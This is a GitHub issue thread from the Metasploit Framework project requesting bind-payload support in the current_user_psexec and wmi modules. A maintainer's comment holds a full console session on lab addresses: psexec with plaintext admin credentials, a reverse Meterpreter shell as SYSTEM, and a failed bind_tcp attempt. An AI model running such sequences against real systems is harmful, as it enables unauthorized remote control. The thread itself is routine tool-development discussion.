
Ability to use bind payloads with wmi and current_user_psexec #3937

Closed
todb-r7 opened this issue Oct 2, 2014 · 2 comments
Labels
attic Older submissions that we still want to work on again confirmed Issues confirmed by a committer feature module

Comments

todb-r7 commented Oct 2, 2014

This issue was RM8694, originally filed by @rsmudge

I love windows/local/current_user_psexec and windows/local/wmi. I noticed though that I can't use bind payloads with these modules.

Sometimes, I'll capture an admin token or creds and need to take control of a system that can't stage to the internet. I usually use psexec_command to drop the firewall and then deliver a bind payload. It'd be nice if these modules supported this workflow.

gwillcox-r7 (Contributor) commented

Seems to still be an issue, nearly 10 years later:

msf6 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                192.168.153.132  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass               test123          no        The password for the specified username
   SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBUser               test             no        The username to authenticate as


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.153.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/psexec) > set USERNAME Administrator
USERNAME => Administrator
msf6 exploit(windows/smb/psexec) > set PASSWORD theAdmin123
PASSWORD => theAdmin123
msf6 exploit(windows/smb/psexec) > set DOMAIN DAFOREST
DOMAIN => DAFOREST
msf6 exploit(windows/smb/psexec) > set RHOST 192.168.153.147
RHOST => 192.168.153.147
msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 192.168.153.128:4444 
[*] 192.168.153.147:445 - Connecting to the server...
[*] 192.168.153.147:445 - Authenticating to 192.168.153.147:445|DAFOREST as user 'Administrator'...
[*] 192.168.153.147:445 - Selecting PowerShell target
[*] 192.168.153.147:445 - Executing the payload...
[+] 192.168.153.147:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (200774 bytes) to 192.168.153.147
[*] Meterpreter session 1 opened (192.168.153.128:4444 -> 192.168.153.147:61411) at 2023-02-01 10:03:10 -0600

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/smb/psexec) > use exploit/windows/local/current_user_psexec 
[*] Using configured payload windows/x64/meterpreter/bind_tcp
msf6 exploit(windows/local/current_user_psexec) > show options

Module options (exploit/windows/local/current_user_psexec):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   DISPNAME                           no        Service display name (Default: random)
   INTERNAL_ADDRESS                   no        Session's internal address or hostname for the victims to grab the payload from (Default: detected)
   KERBEROS          false            yes       Authenticate via Kerberos, dont resolve hostnames
   NAME                               no        Service name on each target in RHOSTS (Default: random)
   RHOSTS                             no        Target address range or CIDR identifier
   SESSION                            yes       The session to run this module on
   TECHNIQUE         PSH              yes       Technique to use (Accepted: PSH, SMB)


Payload options (windows/x64/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST                      no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Universal



View the full module info with the info, or info -d command.

msf6 exploit(windows/local/current_user_psexec) > set SESSION 1 
SESSION => 1
msf6 exploit(windows/local/current_user_psexec) > set RHOST 192.168.153.147
RHOST => 192.168.153.147
msf6 exploit(windows/local/current_user_psexec) > set LPORT 9933
LPORT => 9933
msf6 exploit(windows/local/current_user_psexec) > run

[*] Started bind TCP handler against 192.168.153.147:9933
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/current_user_psexec) > exploit

[*] Started bind TCP handler against 192.168.153.147:9933
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/current_user_psexec) > show options

Module options (exploit/windows/local/current_user_psexec):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   DISPNAME                           no        Service display name (Default: random)
   INTERNAL_ADDRESS                   no        Session's internal address or hostname for the victims to grab the payload from (Default: detected)
   KERBEROS          false            yes       Authenticate via Kerberos, dont resolve hostnames
   NAME                               no        Service name on each target in RHOSTS (Default: random)
   RHOSTS                             no        Target address range or CIDR identifier
   SESSION           1                yes       The session to run this module on
   TECHNIQUE         PSH              yes       Technique to use (Accepted: PSH, SMB)


Payload options (windows/x64/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     9933             yes       The listen port
   RHOST     192.168.153.147  no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Universal



View the full module info with the info, or info -d command.

msf6 exploit(windows/local/current_user_psexec) > 

@gwillcox-r7 gwillcox-r7 added the confirmed Issues confirmed by a committer label Feb 1, 2023
@adfoster-r7 adfoster-r7 added the attic Older submissions that we still want to work on again label Apr 25, 2023
github-actions commented

Thanks for your contribution to Metasploit Framework! We've looked at this issue, and unfortunately we do not currently have the bandwidth to prioritize this issue.

We've labeled this as attic and closed it for now. If you believe this issue has been closed in error, or that it should be prioritized, please comment with additional information.
